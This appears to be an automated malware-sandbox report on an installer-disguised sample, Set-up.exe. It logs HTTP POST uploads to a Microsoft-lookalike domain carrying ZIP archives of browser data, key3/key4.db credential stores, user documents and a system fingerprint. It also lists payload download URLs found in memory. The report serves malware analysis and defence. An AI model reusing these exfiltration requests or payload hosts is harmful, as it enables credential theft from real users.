5a 41 45 42 41 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 64 6e 22 3a 22 6e 75 6c 6c 22 2c 22 64 70 22 3a 22 32 32 32 22 2c 22 73 22 3a 22 31 32 38 30 78 31 30 32 34 22 2c 22 72 22 3a 34 30 39 35 2c 22 65 6c 22 3a 66 61 6c 73 65 2c 22 6c 74 22 3a 22 6e 75 6c 6c 22 2c 22 69 73 22 3a 5b 5d 2c 22 6c 69 22 3a 5b 5d 2c 22 70 6c 22 3a 5b 5d 2c 22 67 22 3a 5b 22 4d 69 63 72 6f 73 6f 66 74 20 42 61 73 69 63 20 44 69 73 70 6c 61 79 20 41 64 61 70 74 65 72 22 5d 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 ff 07 87 57 37 01 00 00 37 01 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 7d 01 00 00 00 00 Data Ascii: PK\d!RW77(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"o":"Windows 10","un":"user","p":"user-PC","a":"x64","c":4,"l":"1746857126149e146be9-c76a-4720-bcdb-53011b87bd06","bt":"ZAEBA","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06","dn":"null","dp":"222","s":"1280x1024","r":4095,"el":false,"lt":"null","is":[],"li":[],"pl":[],"g":["Microsoft Basic Display Adapter"]}PK\d!RW77(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV}
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 139949Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 ca 34 d2 61 00 20 02 00 00 20 02 00 0f 00 00 00 62 2f 63 38 2f 30 2f 57 65 62 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 05 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 4a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 2e 7a 70 05 00 00 00 05 07 e7 00 00 00 00 3c 07 fb 07 f6 07 f1 07 ec 07 e7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 197293Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 70 c7 0d af 00 00 03 00 00 00 03 00 0f 00 00 00 62 2f 63 39 2f 30 2f 57 65 62 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 09 00 00 00 59 00 00 00 00 00 00 00 00 00 00 00 36 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 2e 6a d0 05 00 00 00 08 07 d8 00 00 00 00 57 07 fb 07 f6 07 f1 07 ec 07 e7 07 e2 07 dd 07 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 524954Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 90 a5 8e 8e 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/g HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 14530Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 61 52 b7 be 30 00 00 00 30 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 73 f2 4d 06 02 04 00 00 02 04 00 00 33 00 00 00 67 2f 55 73 65 72 73 2f 61 6c 66 6f 6e 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 53 51 52 4b 48 4e 42 4e 59 4e 2f 53 51 52 4b 48 4e 42 4e 59 4e 2e 64 6f 63 78 53 51 52 4b 48 4e 42 4e 59 4e 45 54 44 43 49 4c 57 49 4b 4c 4e 52 59 48 4a 5a 55 50 43 59 56 54 4a 4a 4b 41 42 59 59 4e 56 45 4a 5a 42 46 4a 47 49 55 5a 45 46 55 48 43 4f 5a 5a 49 53 51 45 4c 5a 55 4c 4d 41 50 46 49 42 55 53 56 47 47 53 58 53 56 5a 52 4e 4a 58 46 56 55 45 49 4b 42 51 4e 41 52 45 4c 4b 4a 45 4a 5a 54 45 42 47 58 49 46 54 42 47 44 58 42 53 59 46 4a 4b 46 49 43 4d 4c 4f 4d 48 5a 5a 53 49 4a 4d 50 49 58 5a 4d 51 55 4c 48 41 5a 57 4e 4f 43 53 43 4c 57 54 4e 4a 4d 43 47 56 51 41 4f 50 59 54 5a 56 52 4c 43 4b 53 55 50 53 4d 57 56 4f 46 43 50 4a 41 4f 4e 47 51 42 50 4c 4d 51 55 54 5a 53 46 59 52 49 42 44 5a 57 42 58 49 45 44 4a 49 53 4d 43 54 47 54 59 4b 45 49 58 57 56 44 56 4f 47 4d 46 55 4e 52 4a 44 4e 45 47 4a 4c 56 57 4e 41 43 42 42 47 49 49 52 54 41 48 47 55 4d 53 4c 53 49 5a 4e 47 54 52 41 55 47 4d 5a 54 56 47 4c 49 41 4b 4c 4c 4b 4a 47 4b 42 4d 58 49 46 50 4f 59 43 51 58 4a 5a 4b 4a 48 54 4c 4e 5a 47 44 43 4c 4d 58 54 59 4f 42 47 46 41 50 4f 51 43 4a 47 52 41 4b 4f 52 4b 47 47 57 50 42 4f 4a 4c 4f 5a 41 54 4b 44 5a 59 46 44 53 4f 4e 55 5a 4f 47 42 46 52 44 42 55 4b 5a 54 56 59 5a 47 58 44 45 57 55 4f 58 4e 57 48 4d 4f 49 42 56 4f 57 4e 57 46 47 42 48 53 44 54 51 51 4b 58 57 5a 45 48 51 4c 41 59 49 58 4f 56 5a 45 45 5a 4e 45 53 4b 4b 57 49 54 59 50 49 44 43 4d 46 48 54 57 56 48 4d 48 46 43 47 4e 45 42 4e 56 42 53 53 51 48 4d 52 53 57 4c 48 56 4d 41 5a 45 52 49 55 46 54 52 58 45 56 5a 48 4b 52 58 57 4f 4d 47 45 54 4a 4a 46 42 52 4c 46 49 42 52 47 4c 41 51 4b 4c 44 46 5a 45 47 48 4c 5a 53 56 41 4d 58 4d 4e 43 43 55 52 4f 58 47 51 4f 4d 44 51 4a 53 4b 55 4e 4f 47 4c 47 59 59 54 56 41 42 45 53 49 44 48 41 53 44 52 41 43 4c 4f 46 45 57 47 50 59 4c 45 4f 52 58 53 59 44 52 44 47 50 47 4f 58 48 49 41 49 53 42 5a 42 44 52 4e 56 51 4a 58 58 49 42 4e 42 58 4d 44 53 4b 58 50 42 53 43 47 4b 47 50 41 53 47 4e 4f 49 44 4b 49 42 46 4a 57 55 49 52 51 48 5a 4c 58 5a 51 56 48 55 45 48 4d 48 54 52 44 57 4b 47 4a 56 51 48 57 46 51 45 42 4a 49 42 51 4c 44 57 51 48 4f 51 4c 58 53 50 46 50 4c 57 50 59 5a 52 4f 59 44 41 51 4f 4f 4f 59 4b 54 50 56 46 51 58 4c 4d 4c 52 44 59 53 56 58 56 41 57 43 45 47 56 53 48 47 44 56 53 48 4f 4e 51 55 41 56 43 42 42 48 4a 52 54 49 4a 41 59 58 55 49 4c 48 4e 47 48 49 58 46 4a 50 4a 46 41 55 44 49 4a 46 4

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 188.114.96.3

Source: global traffic

HTTP traffic detected: GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1Host: mcrsftuptade.proConnection: close

Source: global traffic

DNS traffic detected: DNS query: c.pki.goog

Source: unknown

HTTP traffic detected: POST /Up HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 291Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6c 22 3a 22 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 5a 41 45 42 41 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 b7 00 00 00 00 00 Data Ascii: PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"l":"1746857126149e146be9-c76a-4720-bcdb-53011b87bd06","bt":"ZAEBA","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06"}PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV

Source: Set-up.exe	String found in binary or memory: http://169.254.169.254/latest/meta-data/iam/security-credentials/Retrieving
Source: Set-up.exe	String found in binary or memory: http://XXXXXXwinscp.net/
Source: Set-up.exe	String found in binary or memory: http://XXXXwinscp.net/forum/
Source: Set-up.exe	String found in binary or memory: http://acs.amazonaws.com/groups/global/AllUsers
Source: Set-up.exe	String found in binary or memory: http://acs.amazonaws.com/groups/global/AuthenticatedUsers
Source: Set-up.exe	String found in binary or memory: http://acs.amazonaws.com/groups/s3/LogDelivery
Source: Set-up.exe	String found in binary or memory: http://apache.org/dav/props/
Source: Set-up.exe	String found in binary or memory: http://apache.org/dav/props/T
Source: Set-up.exe	String found in binary or memory: http://apache.org/dav/propset/fs/1
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://h1.coldwalk.top/amshm.bin
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://h1.coldwalk.top/sh.ext.exe.bin
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://h1.coldwalk.top/shark.bin
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Set-up.exe	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Set-up.exe	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/proxy-auth
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/proxy-authProxy-AuthorizationProxy-AuthenticateProxy-Authentication-Inf
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/server-auth
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/server-authAuthorizationWWW-AuthenticateAuthentication-InfoCould
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/server-authhttp://webdav.org/neon/hooks/proxy-authhttp://webdav.org/neo
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/webdav-locking
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/webdav-lockingHas
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/webdav-lockinghttp://webdav.org/neon/hooks/webdav-lockingLocked
